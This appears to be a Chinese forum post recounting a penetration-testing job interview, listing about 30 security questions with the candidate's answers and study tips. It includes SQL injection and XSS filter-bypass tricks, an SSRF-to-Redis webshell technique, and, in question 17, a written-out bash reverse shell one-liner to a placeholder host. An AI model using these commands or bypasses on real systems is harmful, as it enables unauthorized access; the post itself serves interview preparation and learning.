3月4日奇安信-一面-面试经历分享

在此非常感谢以前的大佬分享的面试题（比如招聘置顶帖：渗透测试面试问题2019版，内含大量渗透技巧）
这次就被问到很多上面的问题，分享此次经历给大家，希望对正在面试的大家有所帮助。
（个人的答案很多地方可能不对，仅供抛砖引玉，也欢迎大家指正）

1.反序列化了解吗？FASTJSON、shiro反序列化原理？实操过吗？如何检测反序列化是否存在？

了解，原理是状态信息转换为字符串，反序列式字符串转换为状态信息
实操过，php的反序列化就是利用serialize函数进行序列化，通过construst/destruct/wakeup/to_string触发

然后他就问我FASTJSON、shiro的反序列化的原理，检测，实操
我因为没做过，就傻了，待会儿写完了就去练练

2.sql注入如果空格被过滤了怎么绕过？

比如mysql的%0a,%a0,%0b，还有其他一些替换，比如注释
（19面试题有答案：代替空格的方法：1.%0a、%0b、%a0 等  2./**/ 等注释符     3. ）

3.宽字节了解吗？原理是什么？如何进行防护？

了解，产生原因是后端编码与数据库编码不一致。
gbk编码中文占两个字节，通过拼凑比如%df和/转义符形成一个汉字。
防护的话尽量保持编码一致性，同时对输入的数据进行过滤，比如白名单或者正则

4.如果单引号被过滤如何绕过？

宽字节，hex编码，如果是魔术方法，可以尝试head注入绕过

5.xss了解吗？几种类型？区别是什么？如何检测是否存在xss？xss的大小写可以绕过防护吗？xss防护怎么绕过？

了解：反射型/存储型/dom型
区别是反射型恶意传参大概率在url里，存储型是通过xss平台存储在目标服务器里，dom是js操作浏览器和内容的一个借口，dom型数据可以不过数据包
大小写的话我认为如果是正则过滤的防护方式可以绕过，
绕过方式我当时只说了一个native编码，其实现在想想应该是跟waf一个思路，再加上实体化编码的绕过方法

6.ssrf了解吗？说说

ssrf是服务器请求伪造，可以通过dict ip等方法探测端口，还可以尝试file协议读取文件，如果探测到6379redis端口，因为其root默认无密码，可以通过gopher协议写入一句话webshell

7.常用端口了解吗？6379、ssh、1433、1521、3306、3389、7001、2375端口都是什么服务？

2375当时没有回答上来，后来查到是docker端口

8.RDP连接的电脑关机了怎么办？

我有点蒙，回答的是如果物理已经关机了，那就可能没有办法远程物理开启了
现在想想其实面试官的意思可能是被挤掉线了？

9.我看你写了审计出ibos的代码执行漏洞，那你是如何审计出来的呢？

正常说流程就行，千万不要紧张

10.ASPX的马和ASP的马有什么区别？

感谢19面试题的大佬

11.app渗透会吗？

会，通过burp抓包，进行测试

12.如果抓不了包怎么办？

可能对方根据burp特征信息抓取到了（自己瞎猜），那可以修改特征传参，同时如果抓不了包，可以尝试比如反射型xss的测试

网上答案：可以装xposed或者root下用Frida绕过https强校验

13.应急响应了解吗？如果linux电脑中病毒了怎么办？

应急响应了解，按照下面思路说了说

linux电脑如果中病毒解决方案：（建议大家查查，我的很不保证对）
top 查看进程，如果是挖矿病毒肯定占用cpu较高，然后ps -aux锁定文件位置，kill all命令杀死看看是扔否存在进程，若存在可能存在守护进程或其为子进程，去定时任务/etc/crontab和自启动文件/etc/init.d去查看，如果存在奇怪文件进一步查找，然后利用chattr -i 和chmod 000命令锁定权限，kill杀死进程，然后再删除文件，最后检查是否有可以进程

14.会什么语言？能做到什么程度？

15.webshell免杀会吗？比如过d盾？

当时紧张了没想起来，只说直接用网上的一些绕过姿势了，想不起来的同学和我一起巩固课程吧

16.逆向和免杀木马了解吗？

不太了解（摊手.jpg）

17.反弹 shell 的常用命令知道吗？

bash -i>&/dev/tcp/x.x.x.x/4444 0>&1

18.去年比较火的 log4j漏洞了解吗？复现过吗？原理是什么？

了解，复现过，原理我个人理解是lookup函数引用外部jndi接口，从而可以访问外部数据以及恶意的class（我想说js，但是不知道是不是没敢说）
（公开课有靶场，然后复现视频在b站公众号专栏：前天发的好像）

19.cdn检测方法？cdn如何绕过获取真实ip地址？

20.3389无法连接的几种情况？

21.CSRF 和 XSS 和 XXE 的区别？如何防护？

22.sql注入如何防护？

23.文件包含的常见函数？

24.你如何进行日志查看，使用什么工具？

25.linux定时任务的命令是什么？查看进程的命令是什么？

26.waf的规则使用过吗？说说你写过的简单的规则

27.如果终端中了病毒，你会使用哪些软件进行查杀？

28.如何确定linux病毒是否存在守护进程？

29.xss你使用什么工具进行扫描？

30.工作组渗透如何进行？

总结：
1.简历上的项目尤其是工作经历一定会问，要深入了解，越深越好：
原理->其他函数->实操->防护如何绕过 等等
2.如果让你自我介绍，一定尝试往自己擅长方便引，“熟悉XXXX，擅长XXX”
3.尽量拿src排名，在校生ctf一定尽量打
4.应急响应，病毒处理一定要去学习了解
5.不知道也说说自己的思路，万一蒙对了呢
6.各种漏洞的工具尽量去尝试了解，很可能会问你用过哪些，包括burp等插件